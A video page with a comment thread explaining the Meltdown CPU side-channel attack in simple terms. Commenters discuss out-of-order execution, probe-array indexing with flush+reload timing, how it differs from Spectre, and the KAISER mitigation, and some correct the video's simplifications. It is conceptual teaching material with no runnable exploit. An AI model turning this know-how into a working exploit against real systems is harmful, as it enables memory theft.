Meltdown explained like you're five
ฝัง
- เผยแพร่เมื่อ 5 ก.พ. 2025
- Learn JavaScript 👉learnjavascrip...
React Tutorial 👉react-tutorial...
Learn Programming 👉 learnprogrammi...
Find out how a typical Meltdown attack works in this video that simplifies the code & concept behind it.
Even though there are many pre-requisites to explain how Meltdown works, I've simplified most of the concepts in a 3 minute video.
Subscribe for more videos ► bit.ly/jadjoubran
Icons designed by Freepik, Hadrien & Smashicons from Flaticon
Interested in learning JavaScript and/or React? Checkout my interactive online courses:
- Learn JavaScript: learnjavascript.online
- React Tutorial: react-tutorial.app
First explanation out of 10 I've watched where the author actually read the paper! Thank you very much Jad!
That was the hardest part 😅 I'm glad you like it! I'd appreciate it if you can share it
Again, I have the same problems with this as with your spectre explanation.
What do you mean by "character[secret+15]" ??!!
If secret is 'p', how are you accessing "element number 'p'+15" in the array ?!!
The attacker constructed the character array themselves so there is nothing preventing them from accessing it.
The attacker doesn't need to access the original data set directly. The character array they created themselves is used to infer the value they attempted to access from the protected data set.
@@alexhaigh9575 you did not answer his question
@@AnPham-uz3td I did, but to break it down further for you.
You access "array[p+15]" by iterating the array.
As you created the array yourself it is not protected, so you can loop it and access all the values.
Yes, I believe that's a typo. It should be characters[15]. The idea is to guess the secret value already present in cache. When accessing all elements in the characters array, some element character[i] will have a lesser time because of already being present in cache and this is exactly the secret value (since the secret value was present in the cache to begin with). I could be wrong but this is what I got.
You’re about to save me on my CSE 325 final 😂
Great video! Your example at 2:52 is close but incorrect. The CPU would raise an exception trying to convert the virtual memory address associated with `readCharacter(1000)` as the permission bit would indicate that it is trying to access restricted memory so secret is never cached like you state in the video.
Instead what would be correct is if you speculatively execute some array access after like `probe_array[4096 * secret]` (Assuming 4096 byte pages) which would then correctly cache the data associated with that array. There are other reasons for indexing into an array which deal with the hardware prefetcher caching adjacent lines of memory if they are not spread out enough. Then you can go through `probe_array` with flush+reload and look for the page access with the fastest time.
I do think your explanation provides utility to those that haven't read the paper however because it demonstrates the concept of the cache as a side channel used in the attack and the attack mentioned in the paper can be hard to wrap your head around the first time you read through. Well done on this video!
yea i was gona say, cause the error ud get is pagefault, which is pretty useless and you also dont get acees to page table mappings cause first u dont need it and secondly its a security risk
Underrated TH-camr you are great subbed!
Thanks for the effort and simplification. However: (1) it is actually Spectre that can read another process memory while Meltdown can't - and not vice versa. Meltdown is the easier exploit, mitigated by KAISER. (2) chars[secret+15] being read fast does *not* mean that secret==15. Perhaps you meant to write just chars[15]?
Thanks Ofek! (1) According to spectreattack.com/spectre.pdf Spectre can only read from the current process. For example Javascript that is being compiled JIT can escape its sandbox mode and read data from the current process. Whereas meltdown allows to read data from other processes (meltdownattack.com/meltdown.pdf)
(2) correct, this is an over-simplification for measuring access time when probing the whole array (i.imgur.com/2nJ0IV2.png)
Jad Joubran The javascript example is the least interesting in the paper. Cf section 5 for the cross-process technique - specifically the section on windows implementation example (that ends with 'The completed attack allows the reading of memory
from the victim process.'). Also pls read on the KAISER patch, which already pretty much mitigated meltdown in linux.
Yes indeed, the KAISER patch which was recently deployed helped mitigate the issue on Linux
Jad Joubran Spectre will not have a patch in the near future (retpoline is a promising idea, but it is at the compiler level). Spectre is by far the worse one.
Didn't understood the difference with the Spectre 👻 one, seems to be pretty the same. It's just because it's in another program?
They are very similar, however Spectre takes advantage of speculative execution in branch prediction (when there's an if) whereas meltdown takes advantage of out-of-order execution (multiple lines of code that are running more or less at the same time)
Jad Joubran oh 👌, thanks!
Btw, is there a reason only Meltdown can be patched and not Spectre 👻 (with a patch) ?
Meltdown is being mitigated by enabling KAISER (en.wikipedia.org/wiki/Kernel_page-table_isolation) which was already developed a few years ago but not fully deployed.
Where as for spectre it seems that a decent fix would require changes to the CPU itself
Jad Joubran thanks for the confirmation. 💪
it is not shown how out of order execution leads to attack. You used the same temp late of Spectre
To the best of my understanding, the main difference between Spectre and Meltdown is that Spectre exploits mis-trained branch-predictor, and meltdown exploits seg fault. Is this roughly correct?
(Context: I think I understand Spectre really well, but I don't get how meltdown differs from Spectre)
Why spectre can only access within the same program and meltdown is between different programs?
Holy crap, I've been reading the paper for a while and I still haven't understood how did they exfiltrate data from the cache. Now I do, thanks!
Very well explained and easy to understand!
I'm glad you like it :D
Hi Jad, from my understanding, there isn't any use of transient instructions in the video, am I right? Or perhaps do you mean that the probing of the characters[secret] is done simultaneously as secret = readCharacter(1000)? (which does not seem right to me)
yes indeed proving the array happens as a transient instruction right before the CPU realizes that this is a segmentation fault and that this current program doesn't have access to that secret value
Amazing video, quick informative and to the point.
I'm glad that you like it! I also always love it when videos are concise
very helpful, appreciated
Thank you very much !!
Nicely done, subscribed.
Awesome! I'm glad you like it :D
very helpful. Ouestion to you on Meltdown attack. Say attacker has 2 lines of code. Line 1 raises exception while reading restricted memory. This exception stores secret data into cpu cache. Line 2 tries to guess the secret data in the cpu cache. CPU will raise exception at line 1, continues to execute line 2 due to Out-of-Order execution. Is it right that attacker guesses cache data by executing line 2?
i still can't get the difference between spectre and meltdown
Thank you :)
My pleasure 😃
I never send diagnostics data to developer )))
Why did you remove my comment without even answering my question?
Masterpiece
Can you now explain like I'm three?